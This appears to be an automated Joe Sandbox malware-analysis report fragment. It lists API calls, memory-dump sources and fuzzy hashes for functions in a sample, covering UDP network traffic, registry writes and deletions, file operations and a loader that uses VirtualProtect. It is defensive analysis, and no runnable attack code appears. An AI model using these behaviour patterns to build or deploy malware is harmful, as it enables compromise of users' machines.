                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$CriticalSectionThread$CreateEnterExitLeaveUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 485722307-0
                                                                                                                                                                                                                                    • Opcode ID: 07fc8a5c4dbe00dcc2430b3c5336b3ec8990518febe592ee5708ad3956f7a254
                                                                                                                                                                                                                                    • Instruction ID: 80988ae16480682eb22b39e52f43527100eb4b2f77542447dc924e40df4ade88
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07fc8a5c4dbe00dcc2430b3c5336b3ec8990518febe592ee5708ad3956f7a254
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC3105B4975208DBEB20BB54FC4D7AA7774EB40309F4080A8E305B62C0DBB15594CF66
                                                                                                                                                                                                                                    Function 0128719B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 207networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 01287203
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0128726D
                                                                                                                                                                                                                                    • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01287345
                                                                                                                                                                                                                                    • recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01287374
                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 0128750D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: closesocketrecvfromselectsendtosocket
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 4198204009-2766056989
                                                                                                                                                                                                                                    • Opcode ID: a31e513e80dee2b9fd77403f6837e0cd1caa2c70110e3a7d26efa89edf343d7c
                                                                                                                                                                                                                                    • Instruction ID: fcd790fdf868a1172540f2be150089f444ce52b2e4b0b54f779abd5148514e4e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a31e513e80dee2b9fd77403f6837e0cd1caa2c70110e3a7d26efa89edf343d7c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD91BD70D191A98AEB38DB28DC50BEDBB75AF44300F6442D9E39DA61C0D7B05EC48F60
                                                                                                                                                                                                                                    Function 01288F51 Relevance: 10.6, APIs: 7, Instructions: 110registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(01289F2F,01282E8C,00000000,000F003F,01289F2F), ref: 01288FA0
                                                                                                                                                                                                                                    • RegEnumValueA.KERNEL32(01289F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01288FD7
                                                                                                                                                                                                                                    • RegDeleteValueA.KERNEL32(01289F2F,00000000), ref: 01289000
                                                                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(01289F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01289038
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0128906B
                                                                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(01289F2F,00000000), ref: 01289092
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(01289F2F), ref: 012890AF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeleteEnumValue$CloseOpenwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2321319729-0
                                                                                                                                                                                                                                    • Opcode ID: 91e94ed9e4726e7c4cff87bd638d395aefe137ae8f1855bc1608060c2e56ca10
                                                                                                                                                                                                                                    • Instruction ID: 8744838b2ed46675651dda4be8d2538116c005c3e6e365cea50875983544bdff
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91e94ed9e4726e7c4cff87bd638d395aefe137ae8f1855bc1608060c2e56ca10
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 034171B5A10208FBDF24DB94DC84BEEBBB9AB88704F00C198E305A71C4D77466898F94
                                                                                                                                                                                                                                    Function 01292EBC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82registrystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,0128244C,00000000,000F003F,?,?), ref: 01292F03
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,01282488,00000000,00000004,00000002,00000004), ref: 01292F31
                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 01292F3E
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,01282550), ref: 01292F99
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01282548), ref: 01292FAC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseOpenValuelstrcatlstrcpy
                                                                                                                                                                                                                                    • String ID: >
                                                                                                                                                                                                                                    • API String ID: 1115058322-325317158
                                                                                                                                                                                                                                    • Opcode ID: 1a1a286818de6c2160f8c2510e189216ccd4b34f6c1d378193f3ec86627d558f
                                                                                                                                                                                                                                    • Instruction ID: b2506858301d2a94fb0a468bc67d03b496ee382217665a78a0fc3ad4abe67dbb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a1a286818de6c2160f8c2510e189216ccd4b34f6c1d378193f3ec86627d558f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2314475910214EBDB24DF58EC49BE5B778EBA5300F00C2C9E64967294D7B46ED4CF90
                                                                                                                                                                                                                                    Function 01290B9A Relevance: 10.6, APIs: 7, Instructions: 51filestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 01290BC8
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 01290BCE
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,01283D08,00000000), ref: 01290BE1
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01290BEF
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01290C0E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01290C2A
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 01290C37
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCountCreateDeleteHandleTicklstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3232967151-0
                                                                                                                                                                                                                                    • Opcode ID: e675710feab2a7fa884fc49bd18a14d624272b0e462e76d5ec8536ac9aeb1aac
                                                                                                                                                                                                                                    • Instruction ID: a3787420b821ad6b3b2c4f95934e5da0cf60fcab1eff652eee7ba2bad81c1c63
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e675710feab2a7fa884fc49bd18a14d624272b0e462e76d5ec8536ac9aeb1aac
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E115EB5500218ABDB309B68EC0DBAA7B7CBB84705F0085E8F709B21D5D674AA568F58
                                                                                                                                                                                                                                    Function 01292E32 Relevance: 9.1, APIs: 6, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 01292E52
                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 01292E6E
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 01292E78
                                                                                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 01292E8C
                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 01292EA8
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 01292EB2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseValue$CreateOpen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2738932338-0
                                                                                                                                                                                                                                    • Opcode ID: 181144483a5da380dd86410f98d03b2e2a6df98b0e72e7e4fec508f5087db678
                                                                                                                                                                                                                                    • Instruction ID: 79d359d20d503ee6f92bd8ec9d7dc11cfa44869dfa8271dfd3fa4ada2a880897
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 181144483a5da380dd86410f98d03b2e2a6df98b0e72e7e4fec508f5087db678
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC11ECB9B50208FBDB14DF94D999FAE77B8AB48700F108148FB0597194D670AA149B90
                                                                                                                                                                                                                                    Function 01284BF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83registrystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01284C2F
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01284CDD
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01284D04
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 01284D2E
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01284D3D
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 01284D5D
                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 01284D6F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Valuelstrcpy$Closelstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 3050549977-3143526458
                                                                                                                                                                                                                                    • Opcode ID: 641000252eb50d06b71bc48d6484ab0fa74bce9d0910386e4265fc1327658a50
                                                                                                                                                                                                                                    • Instruction ID: 15bf5ee3997f4d6365fa05e29378212e38f0b6c28181d4954a896f02f69b704d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 641000252eb50d06b71bc48d6484ab0fa74bce9d0910386e4265fc1327658a50
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02314874910259EFCB28EF14D896AD9F775FB58301F00C5D8E70AAB284D670AAC1CF90
                                                                                                                                                                                                                                    Function 01317AC0 Relevance: 7.7, APIs: 5, Instructions: 207librarymemoryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 01317C02
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,01314FF9), ref: 01317C20
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(?,01314FF9), ref: 01317C31
                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(01260000,00001000,00000004,?,00000000), ref: 01317C7F
                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(01260000,00001000), ref: 01317C94
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1996367037-0
                                                                                                                                                                                                                                    • Opcode ID: 8661ee85e38b5ae502d1d26f5ba9dfee235b242c242208d15a4e6009ea2b6732
                                                                                                                                                                                                                                    • Instruction ID: b1f0b051cec903e806b33b0f70d26963e54fb8610753341dbc0058d78290ca60
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8661ee85e38b5ae502d1d26f5ba9dfee235b242c242208d15a4e6009ea2b6732
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5513672A543164BD7299EBCDCC06A0BBA4FB4523871C0739C7E6C73CAEBA458068760
                                                                                                                                                                                                                                    Function 012884C1 Relevance: 7.6, APIs: 5, Instructions: 134threadnetworkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(012994C8), ref: 01288500
                                                                                                                                                                                                                                    • htons.WS2_32(00000000), ref: 01288559
                                                                                                                                                                                                                                      • Part of subcall function 0128719B: socket.WS2_32(00000002,00000002,00000011), ref: 01287203
                                                                                                                                                                                                                                      • Part of subcall function 0128719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0128726D
                                                                                                                                                                                                                                      • Part of subcall function 0128719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01287345
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 012885C1
                                                                                                                                                                                                                                      • Part of subcall function 0128719B: recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01287374
                                                                                                                                                                                                                                      • Part of subcall function 0128719B: closesocket.WS2_32(?), ref: 0128750D
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(012994C8), ref: 012886EA
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 012886F2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1469894868-0
                                                                                                                                                                                                                                    • Opcode ID: cdfdcc7c1f0234dac66814b81e802b71594fb028cf86b733ef44db5ba886c3ea
                                                                                                                                                                                                                                    • Instruction ID: cc92b4622231a56f41997b4ca64cbf99b2b917ba4ccaf4d2f3edc883fe3c6156
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdfdcc7c1f0234dac66814b81e802b71594fb028cf86b733ef44db5ba886c3ea
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B518B74910258CFDB24DF28D854BE9B3B8BF44308F5085D9E58DA7289E7B1AAC4CF51
                                                                                                                                                                                                                                    Function 01291D8F Relevance: 7.6, APIs: 5, Instructions: 72registrysleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01291DD7
                                                                                                                                                                                                                                    • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 01291E14
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 01291E3D
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000100), ref: 01291E73
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 01291E90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesCloseEnumFileOpenSleepValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 684116133-0
                                                                                                                                                                                                                                    • Opcode ID: 10104a00b54ad564de0b6a27de6d321beb19ebe73b68444f5afeb5a17522908c
                                                                                                                                                                                                                                    • Instruction ID: 8bb840ca37be70d557486ed97000bbd1a49b70e29ce1305d9f9c54e604c9ee1b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10104a00b54ad564de0b6a27de6d321beb19ebe73b68444f5afeb5a17522908c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05218E75E10219EBEF35CB68DC49BE9B778AB58710F1085D8E788A61C0D7F06AD48F90
                                                                                                                                                                                                                                    Function 012927D4 Relevance: 6.1, APIs: 4, Instructions: 103sleepmemorythreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00014000), ref: 01292801
                                                                                                                                                                                                                                      • Part of subcall function 0128C89A: MapViewOfFile.KERNEL32(000001E8,00000006,00000000,00000000,00015400), ref: 0128C8D1
                                                                                                                                                                                                                                      • Part of subcall function 0128C89A: UnmapViewOfFile.KERNEL32(00000000), ref: 0128C900
                                                                                                                                                                                                                                    • GlobalFree.KERNELBASE(?), ref: 01292849
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002800), ref: 01292924
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 01292947
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2983513495-0
                                                                                                                                                                                                                                    • Opcode ID: fd5a8baa8a1fc11274bf652be38c1f3256a9d3034fb2b18e331136161c6c38f2
                                                                                                                                                                                                                                    • Instruction ID: b4cde9f9a19d1e3329e1d51e77274d1c4616a6768e693e2b51412831c23bb331
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd5a8baa8a1fc11274bf652be38c1f3256a9d3034fb2b18e331136161c6c38f2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5131D670E10205FBEF15DF99ED05BAE77B4BB59720F148228F505A73C4E7B659008B62
                                                                                                                                                                                                                                    Function 01291E9B Relevance: 6.0, APIs: 4, Instructions: 25sleepthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001000), ref: 01291EA3
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 01291EEA
                                                                                                                                                                                                                                      • Part of subcall function 01291D8F: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01291DD7
                                                                                                                                                                                                                                      • Part of subcall function 01291D8F: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 01291E14
                                                                                                                                                                                                                                      • Part of subcall function 01291D8F: RegCloseKey.ADVAPI32(?), ref: 01291E90
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00004E20), ref: 01291EC6
                                                                                                                                                                                                                                      • Part of subcall function 01291D8F: GetFileAttributesA.KERNEL32(00000000), ref: 01291E3D
                                                                                                                                                                                                                                      • Part of subcall function 01291D8F: Sleep.KERNEL32(00000100), ref: 01291E73
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00057E40), ref: 01291EE0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
